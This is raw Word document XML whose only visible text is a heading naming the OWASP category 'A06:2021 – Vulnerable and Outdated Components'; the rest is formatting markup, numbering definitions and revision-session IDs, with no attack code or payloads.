    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="16B021F6" w14:textId="0937CC11">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1C998F72" w:rsidP="0473AF89" w:rsidRDefault="1C998F72" w14:paraId="18F02A19" w14:textId="38977F5F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="600" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="0473AF89" w:rsidR="1C998F72">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>A06:2021 – Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="27DBE2A4" w14:textId="1339828D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="481E5A85" w14:textId="014CE816">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="783DC9B4" w14:textId="51E4ECD6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="0E4EC28F" w14:textId="0E79A2C9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="764D761D" w:rsidP="764D761D" w:rsidRDefault="764D761D" w14:paraId="13581F73" w14:textId="3648F34F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="6F8D0405" w14:textId="70A2604B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="109EE887" w14:textId="48687ECD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="0600FACD" w14:textId="2A3CA00E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="7C044D52" w14:textId="17D7C098">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="072B825D" w14:textId="21340036">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="18FB3CCD" w14:textId="2FCB4227">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="31C57096" w14:textId="069EF59C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="0E96ACB5" w14:textId="43C91F9B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="2E43EF0A" w14:textId="22694DAA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0532CDF9" w:rsidP="764D761D" w:rsidRDefault="0532CDF9" w14:paraId="0C3CA1EB" w14:textId="26B79E87">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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jtIG9gqq" int2:invalidationBookmarkName="" int2:hashCode="Z/zYLJJnIbLBSY" int2:id="hPpAg3f7">
      <int2:state int2:type="WordDesignerDefaultAnnotation"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36">
    <w:nsid w:val="41c5f8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3d6e7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2bfd4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35f03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98708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7871dc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2221d6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1f5fe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f1b1b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ebaf2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41d87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e418b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d2764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1"/>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54f6c7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0"/>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118677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9"/>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151de8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8"/>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3af7980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7"/>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7bdcef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6"/>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4cc80a7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77dd2c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6c7fc4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52bb537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00a33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upperRoman"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="righ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6e35d47a"/>
    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
      <w:start w:val="1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40a78366"/>
    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
      <w:start w:val="1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3db91a04"/>
    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
      <w:start w:val="1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e973ca6"/>
    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
      <w:start w:val="10"/>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18289e03"/>
    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
      <w:start w:val="9"/>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1b8c85f5"/>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2bbb0295"/>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348a1090"/>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2c3fd4f"/>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1add0cf"/>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3789dc08"/>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e297305"/>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5e51d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E852F92"/>
    <w:rsid w:val="005BEAA7"/>
    <w:rsid w:val="005DB3DC"/>
    <w:rsid w:val="0089411D"/>
    <w:rsid w:val="00F1C5C2"/>
    <w:rsid w:val="00FC38F2"/>
    <w:rsid w:val="01D805F0"/>
    <w:rsid w:val="0221F00E"/>
    <w:rsid w:val="0233D5AC"/>
    <w:rsid w:val="031BDB44"/>
    <w:rsid w:val="03938B69"/>
    <w:rsid w:val="0473AF89"/>
    <w:rsid w:val="04A50058"/>
    <w:rsid w:val="04AA148D"/>
    <w:rsid w:val="0524421C"/>
    <w:rsid w:val="0532CDF9"/>
    <w:rsid w:val="055990D0"/>
    <w:rsid w:val="059B88CA"/>
    <w:rsid w:val="05BE9DDA"/>
    <w:rsid w:val="06101789"/>
    <w:rsid w:val="0713025C"/>
    <w:rsid w:val="07163AD0"/>
    <w:rsid w:val="079D7B3A"/>
    <w:rsid w:val="0810CF42"/>
    <w:rsid w:val="082EE044"/>
    <w:rsid w:val="084255DA"/>
    <w:rsid w:val="0890DB9A"/>
    <w:rsid w:val="08913192"/>
    <w:rsid w:val="08D3298C"/>
    <w:rsid w:val="08F312A7"/>
    <w:rsid w:val="0925A44C"/>
    <w:rsid w:val="097CC6D8"/>
    <w:rsid w:val="09AC9FA3"/>
    <w:rsid w:val="09BF0F08"/>
    <w:rsid w:val="09DE263B"/>
    <w:rsid w:val="09EEB3C9"/>
    <w:rsid w:val="0ACDB4B5"/>
    <w:rsid w:val="0B4DFB2E"/>
    <w:rsid w:val="0BF091C7"/>
    <w:rsid w:val="0C0ACA4E"/>
    <w:rsid w:val="0C6DE471"/>
    <w:rsid w:val="0C912C81"/>
    <w:rsid w:val="0CDEDE1E"/>
    <w:rsid w:val="0D14D576"/>
    <w:rsid w:val="0D15C6FD"/>
    <w:rsid w:val="0D3A6DAF"/>
    <w:rsid w:val="0DAB0722"/>
    <w:rsid w:val="0DE0234E"/>
    <w:rsid w:val="0E43FA30"/>
    <w:rsid w:val="0E732591"/>
    <w:rsid w:val="0F0F9EC7"/>
    <w:rsid w:val="0F2CC447"/>
    <w:rsid w:val="0F3BFA73"/>
    <w:rsid w:val="0F3BFA73"/>
    <w:rsid w:val="0F88997B"/>
    <w:rsid w:val="0FB91355"/>
    <w:rsid w:val="0FC71678"/>
    <w:rsid w:val="0FD2EF4B"/>
    <w:rsid w:val="10295BD7"/>
    <w:rsid w:val="119171A1"/>
    <w:rsid w:val="12A81B36"/>
    <w:rsid w:val="12BF1991"/>
    <w:rsid w:val="130E019A"/>
    <w:rsid w:val="13145FFD"/>
    <w:rsid w:val="134A0046"/>
    <w:rsid w:val="143FDBC7"/>
    <w:rsid w:val="14E01800"/>
    <w:rsid w:val="15413D4B"/>
    <w:rsid w:val="15483956"/>
    <w:rsid w:val="15572AA5"/>
    <w:rsid w:val="1585B5C9"/>
    <w:rsid w:val="15AA8240"/>
    <w:rsid w:val="15AB3BF7"/>
    <w:rsid w:val="1629A597"/>
    <w:rsid w:val="16AD3AC9"/>
    <w:rsid w:val="16FE756D"/>
    <w:rsid w:val="177F1896"/>
    <w:rsid w:val="189CA64A"/>
    <w:rsid w:val="18AF42E2"/>
    <w:rsid w:val="18B927AB"/>
    <w:rsid w:val="18BD568B"/>
    <w:rsid w:val="19C9256B"/>
    <w:rsid w:val="1A012925"/>
    <w:rsid w:val="1A19B542"/>
    <w:rsid w:val="1A7BD684"/>
    <w:rsid w:val="1B32532C"/>
    <w:rsid w:val="1BAD83C8"/>
    <w:rsid w:val="1BE6E3A4"/>
    <w:rsid w:val="1BF2C527"/>
    <w:rsid w:val="1C44DBDC"/>
    <w:rsid w:val="1C4A7D90"/>
    <w:rsid w:val="1C94D125"/>
    <w:rsid w:val="1C998F72"/>
    <w:rsid w:val="1CB83EEC"/>
    <w:rsid w:val="1D4846BB"/>
    <w:rsid w:val="1D70176D"/>
    <w:rsid w:val="1DD64F93"/>
    <w:rsid w:val="1E4B0E32"/>
    <w:rsid w:val="1E69F3EE"/>
    <w:rsid w:val="1EB53281"/>
    <w:rsid w:val="1FC6FC70"/>
    <w:rsid w:val="20CA6D0A"/>
    <w:rsid w:val="2192BADB"/>
    <w:rsid w:val="2204F01C"/>
    <w:rsid w:val="2217E83D"/>
    <w:rsid w:val="2248E660"/>
    <w:rsid w:val="226650B5"/>
    <w:rsid w:val="226C5236"/>
    <w:rsid w:val="2291AC85"/>
    <w:rsid w:val="2294263E"/>
    <w:rsid w:val="22C9CAE8"/>
    <w:rsid w:val="2343595E"/>
    <w:rsid w:val="234E2EE3"/>
    <w:rsid w:val="2386EDED"/>
    <w:rsid w:val="238EE30E"/>
    <w:rsid w:val="24444049"/>
    <w:rsid w:val="249A6D93"/>
    <w:rsid w:val="2530A09C"/>
    <w:rsid w:val="255E0706"/>
    <w:rsid w:val="25793BAC"/>
    <w:rsid w:val="25A993F6"/>
    <w:rsid w:val="265D9C39"/>
    <w:rsid w:val="26900B9E"/>
    <w:rsid w:val="26ED0150"/>
    <w:rsid w:val="2765D36E"/>
    <w:rsid w:val="2776E461"/>
    <w:rsid w:val="27A9D25B"/>
    <w:rsid w:val="27C08FC3"/>
    <w:rsid w:val="27DC97E5"/>
    <w:rsid w:val="28000D94"/>
    <w:rsid w:val="2806D921"/>
    <w:rsid w:val="281EC475"/>
    <w:rsid w:val="282512F8"/>
    <w:rsid w:val="286FD77B"/>
    <w:rsid w:val="2892C117"/>
    <w:rsid w:val="28BF7C49"/>
    <w:rsid w:val="295CE02B"/>
    <w:rsid w:val="299BDDF5"/>
    <w:rsid w:val="29E3D852"/>
    <w:rsid w:val="2A92CD82"/>
    <w:rsid w:val="2B6C5FF9"/>
    <w:rsid w:val="2BAAC5F6"/>
    <w:rsid w:val="2C2739A1"/>
    <w:rsid w:val="2C5CC4E9"/>
    <w:rsid w:val="2C5FED3C"/>
    <w:rsid w:val="2C8426BE"/>
    <w:rsid w:val="2CAD6CFE"/>
    <w:rsid w:val="2D90FB0B"/>
    <w:rsid w:val="2DFCFBF5"/>
    <w:rsid w:val="2EB469AE"/>
    <w:rsid w:val="2EF14ACD"/>
    <w:rsid w:val="2F29F91E"/>
    <w:rsid w:val="2F6F7825"/>
    <w:rsid w:val="2FA4E51A"/>
    <w:rsid w:val="2FE50DC0"/>
    <w:rsid w:val="30C5C97F"/>
    <w:rsid w:val="3144DB6F"/>
    <w:rsid w:val="31C37260"/>
    <w:rsid w:val="31C93CA2"/>
    <w:rsid w:val="32465999"/>
    <w:rsid w:val="32D22EB0"/>
    <w:rsid w:val="3319C3F7"/>
    <w:rsid w:val="332B5B4E"/>
    <w:rsid w:val="33BF03C3"/>
    <w:rsid w:val="34223F5C"/>
    <w:rsid w:val="34435FD5"/>
    <w:rsid w:val="345123AB"/>
    <w:rsid w:val="3480629B"/>
    <w:rsid w:val="34DB6A37"/>
    <w:rsid w:val="35076ADA"/>
    <w:rsid w:val="3599586D"/>
    <w:rsid w:val="35E26198"/>
    <w:rsid w:val="35F648C9"/>
    <w:rsid w:val="36044C6B"/>
    <w:rsid w:val="36CF295C"/>
    <w:rsid w:val="36D0E4F7"/>
    <w:rsid w:val="37060964"/>
    <w:rsid w:val="3717E8B7"/>
    <w:rsid w:val="37573033"/>
    <w:rsid w:val="37B64C8C"/>
    <w:rsid w:val="37F01FA5"/>
    <w:rsid w:val="382708B3"/>
    <w:rsid w:val="3886801F"/>
    <w:rsid w:val="38CEEDBE"/>
    <w:rsid w:val="3953D3BE"/>
    <w:rsid w:val="39FBEF34"/>
    <w:rsid w:val="39FD139C"/>
    <w:rsid w:val="3A232D55"/>
    <w:rsid w:val="3A65084A"/>
    <w:rsid w:val="3A7899A7"/>
    <w:rsid w:val="3BE8AFA4"/>
    <w:rsid w:val="3C835B61"/>
    <w:rsid w:val="3C9DF88F"/>
    <w:rsid w:val="3CE67994"/>
    <w:rsid w:val="3D0758C7"/>
    <w:rsid w:val="3D0BD7D3"/>
    <w:rsid w:val="3D53D6A4"/>
    <w:rsid w:val="3DAEC013"/>
    <w:rsid w:val="3DDAFA04"/>
    <w:rsid w:val="3E3830B6"/>
    <w:rsid w:val="3E4C6C49"/>
    <w:rsid w:val="3EA3F51C"/>
    <w:rsid w:val="3FCBDEE6"/>
    <w:rsid w:val="401AB77E"/>
    <w:rsid w:val="40724F09"/>
    <w:rsid w:val="4092462D"/>
    <w:rsid w:val="40D19885"/>
    <w:rsid w:val="41129AC6"/>
    <w:rsid w:val="417D031A"/>
    <w:rsid w:val="41923B96"/>
    <w:rsid w:val="41B687DF"/>
    <w:rsid w:val="420307D7"/>
    <w:rsid w:val="42719C81"/>
    <w:rsid w:val="42FB5E51"/>
    <w:rsid w:val="43273F7C"/>
    <w:rsid w:val="43525840"/>
    <w:rsid w:val="435A8763"/>
    <w:rsid w:val="4362BE8D"/>
    <w:rsid w:val="43A08D00"/>
    <w:rsid w:val="44176A69"/>
    <w:rsid w:val="44176A69"/>
    <w:rsid w:val="4478DB43"/>
    <w:rsid w:val="449E37A7"/>
    <w:rsid w:val="44D31D31"/>
    <w:rsid w:val="455E5C9F"/>
    <w:rsid w:val="45D5B289"/>
    <w:rsid w:val="46ACD5F6"/>
    <w:rsid w:val="47D764E4"/>
    <w:rsid w:val="48858E7D"/>
    <w:rsid w:val="48D260E5"/>
    <w:rsid w:val="496444C1"/>
    <w:rsid w:val="49E24A05"/>
    <w:rsid w:val="4AC6E3D7"/>
    <w:rsid w:val="4B102C9C"/>
    <w:rsid w:val="4B9379AF"/>
    <w:rsid w:val="4B99262F"/>
    <w:rsid w:val="4BB5D0E5"/>
    <w:rsid w:val="4CB29722"/>
    <w:rsid w:val="4CEE8B74"/>
    <w:rsid w:val="4D51A146"/>
    <w:rsid w:val="4DA3CFFE"/>
    <w:rsid w:val="4DD107FD"/>
    <w:rsid w:val="4DE43D32"/>
    <w:rsid w:val="4E3333E8"/>
    <w:rsid w:val="4E3BDF18"/>
    <w:rsid w:val="4E439F60"/>
    <w:rsid w:val="4E950AE7"/>
    <w:rsid w:val="4EA69EB0"/>
    <w:rsid w:val="4EAC27A4"/>
    <w:rsid w:val="4EC316DC"/>
    <w:rsid w:val="4FDF6FC1"/>
    <w:rsid w:val="4FFBBF8F"/>
    <w:rsid w:val="502090BD"/>
    <w:rsid w:val="5135E8F9"/>
    <w:rsid w:val="514D0067"/>
    <w:rsid w:val="51AA97AA"/>
    <w:rsid w:val="5229B9D0"/>
    <w:rsid w:val="5231C5F9"/>
    <w:rsid w:val="5290D229"/>
    <w:rsid w:val="539F3ED3"/>
    <w:rsid w:val="53B20143"/>
    <w:rsid w:val="5447A393"/>
    <w:rsid w:val="54FD612E"/>
    <w:rsid w:val="556933C3"/>
    <w:rsid w:val="55820FFD"/>
    <w:rsid w:val="5601660B"/>
    <w:rsid w:val="56A9857C"/>
    <w:rsid w:val="56E1674B"/>
    <w:rsid w:val="571977DB"/>
    <w:rsid w:val="5777406C"/>
    <w:rsid w:val="579D5612"/>
    <w:rsid w:val="58A0D485"/>
    <w:rsid w:val="58D2BC2D"/>
    <w:rsid w:val="58F097AA"/>
    <w:rsid w:val="5925010E"/>
    <w:rsid w:val="5929510D"/>
    <w:rsid w:val="594A0672"/>
    <w:rsid w:val="5A14A5BC"/>
    <w:rsid w:val="5A80723B"/>
    <w:rsid w:val="5AF88E93"/>
    <w:rsid w:val="5B5F807C"/>
    <w:rsid w:val="5BA3EBBF"/>
    <w:rsid w:val="5BB5D577"/>
    <w:rsid w:val="5BB773B9"/>
    <w:rsid w:val="5BD02F47"/>
    <w:rsid w:val="5C5CA1D0"/>
    <w:rsid w:val="5D3B8CE6"/>
    <w:rsid w:val="5D4D3DA8"/>
    <w:rsid w:val="5E302F55"/>
    <w:rsid w:val="5E680DF1"/>
    <w:rsid w:val="5EA6EEBE"/>
    <w:rsid w:val="5EE9729D"/>
    <w:rsid w:val="5EF6EDAC"/>
    <w:rsid w:val="5FA74828"/>
    <w:rsid w:val="60090CF2"/>
    <w:rsid w:val="60C444A5"/>
    <w:rsid w:val="6139418E"/>
    <w:rsid w:val="6226B53D"/>
    <w:rsid w:val="626F984F"/>
    <w:rsid w:val="62FB5D8B"/>
    <w:rsid w:val="638B3CE3"/>
    <w:rsid w:val="643EE619"/>
    <w:rsid w:val="644602B2"/>
    <w:rsid w:val="645F3A05"/>
    <w:rsid w:val="6478BD46"/>
    <w:rsid w:val="647BA5D7"/>
    <w:rsid w:val="64BE54BA"/>
    <w:rsid w:val="659F4F4D"/>
    <w:rsid w:val="65A55615"/>
    <w:rsid w:val="65AC60B4"/>
    <w:rsid w:val="66119221"/>
    <w:rsid w:val="6636B3A3"/>
    <w:rsid w:val="6656A140"/>
    <w:rsid w:val="665A251B"/>
    <w:rsid w:val="66812364"/>
    <w:rsid w:val="66E33B20"/>
    <w:rsid w:val="67747EB5"/>
    <w:rsid w:val="6799758A"/>
    <w:rsid w:val="67D7296E"/>
    <w:rsid w:val="68EAC3D8"/>
    <w:rsid w:val="6905A84D"/>
    <w:rsid w:val="69D6AF3C"/>
    <w:rsid w:val="6A33F5E4"/>
    <w:rsid w:val="6A43C8E6"/>
    <w:rsid w:val="6C10FA18"/>
    <w:rsid w:val="6C6BD433"/>
    <w:rsid w:val="6C8E2294"/>
    <w:rsid w:val="6D2AE285"/>
    <w:rsid w:val="6D641D1D"/>
    <w:rsid w:val="6D71556A"/>
    <w:rsid w:val="6DD1ED83"/>
    <w:rsid w:val="6E49CA4B"/>
    <w:rsid w:val="6E99C25E"/>
    <w:rsid w:val="6F9E4917"/>
    <w:rsid w:val="6FB7647E"/>
    <w:rsid w:val="6FE2AB8D"/>
    <w:rsid w:val="7088E7FB"/>
    <w:rsid w:val="7090C90A"/>
    <w:rsid w:val="70B44197"/>
    <w:rsid w:val="70E7478F"/>
    <w:rsid w:val="719F47E1"/>
    <w:rsid w:val="71B11881"/>
    <w:rsid w:val="71CA961A"/>
    <w:rsid w:val="71E2AA64"/>
    <w:rsid w:val="724DA1F9"/>
    <w:rsid w:val="727B278B"/>
    <w:rsid w:val="727D34CF"/>
    <w:rsid w:val="727E2656"/>
    <w:rsid w:val="72DEA95F"/>
    <w:rsid w:val="72E69507"/>
    <w:rsid w:val="72FAF818"/>
    <w:rsid w:val="74449632"/>
    <w:rsid w:val="74E37ED9"/>
    <w:rsid w:val="750236DC"/>
    <w:rsid w:val="757D7779"/>
    <w:rsid w:val="7593DA57"/>
    <w:rsid w:val="764D761D"/>
    <w:rsid w:val="7659528A"/>
    <w:rsid w:val="76C200EE"/>
    <w:rsid w:val="76C200EE"/>
    <w:rsid w:val="76CEA4DD"/>
    <w:rsid w:val="76CED609"/>
    <w:rsid w:val="771B1437"/>
    <w:rsid w:val="77395D0C"/>
    <w:rsid w:val="77DBFA8E"/>
    <w:rsid w:val="782A442A"/>
    <w:rsid w:val="78A7EB49"/>
    <w:rsid w:val="78B6E498"/>
    <w:rsid w:val="78ED67DA"/>
    <w:rsid w:val="7922DBD9"/>
    <w:rsid w:val="79459C76"/>
    <w:rsid w:val="79865E96"/>
    <w:rsid w:val="7991910B"/>
    <w:rsid w:val="79CCF710"/>
    <w:rsid w:val="79D3BFF5"/>
    <w:rsid w:val="7A28BCD3"/>
    <w:rsid w:val="7A28BCD3"/>
    <w:rsid w:val="7ADF3BE4"/>
    <w:rsid w:val="7B32FF1E"/>
    <w:rsid w:val="7B5E20E6"/>
    <w:rsid w:val="7B708BAC"/>
    <w:rsid w:val="7B8460F5"/>
    <w:rsid w:val="7BB68E59"/>
    <w:rsid w:val="7BB9858B"/>
    <w:rsid w:val="7BCD421D"/>
    <w:rsid w:val="7CD0F289"/>
    <w:rsid w:val="7D2449E4"/>
    <w:rsid w:val="7D745B4F"/>
    <w:rsid w:val="7DD31A64"/>
    <w:rsid w:val="7DF6365A"/>
    <w:rsid w:val="7E25B5E4"/>
    <w:rsid w:val="7E852F92"/>
    <w:rsid w:val="7EA4276F"/>
    <w:rsid w:val="7F0A2138"/>
    <w:rsid w:val="7F822E67"/>
    <w:rsid w:val="7FAF5B52"/>
    <w:rsid w:val="7FF7C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52F92"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B84481D6-4F20-4B03-8447-2C8B55B558B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normaltextrun" w:customStyle="true">
    <w:uiPriority w:val="1"/>
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="449E37A7"/>
  </w:style>
  <w:style w:type="character" w:styleId="eop" w:customStyle="true">
    <w:uiPriority w:val="1"/>
